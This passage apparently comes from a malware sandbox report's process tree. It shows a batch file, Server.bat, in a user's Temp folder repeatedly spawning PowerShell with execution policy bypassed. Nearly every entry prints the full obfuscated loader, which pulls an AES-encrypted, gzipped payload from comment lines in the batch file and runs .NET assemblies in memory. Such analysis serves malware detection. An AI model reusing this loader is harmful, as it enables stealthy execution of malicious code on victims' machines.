        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        135⤵
        
        PID:3004
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        133⤵
        
        PID:1436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        134⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1936
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        132⤵
        
        PID:2060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        133⤵
        
        PID:2328
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        131⤵
        
        PID:2608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        132⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1776
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        130⤵
        
        PID:2408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        131⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1864
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        129⤵
        
        PID:1644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        130⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2256
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        128⤵
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        129⤵
        
        PID:2748
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        127⤵
        
        PID:2612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        128⤵
        
        PID:1504
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        126⤵
        
        PID:1468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        127⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2568
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        125⤵
        
        PID:960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        126⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2644
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        124⤵
        
        PID:844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        125⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1192
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        123⤵
        
        PID:2516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        124⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1936
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        122⤵
        
        PID:1932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); 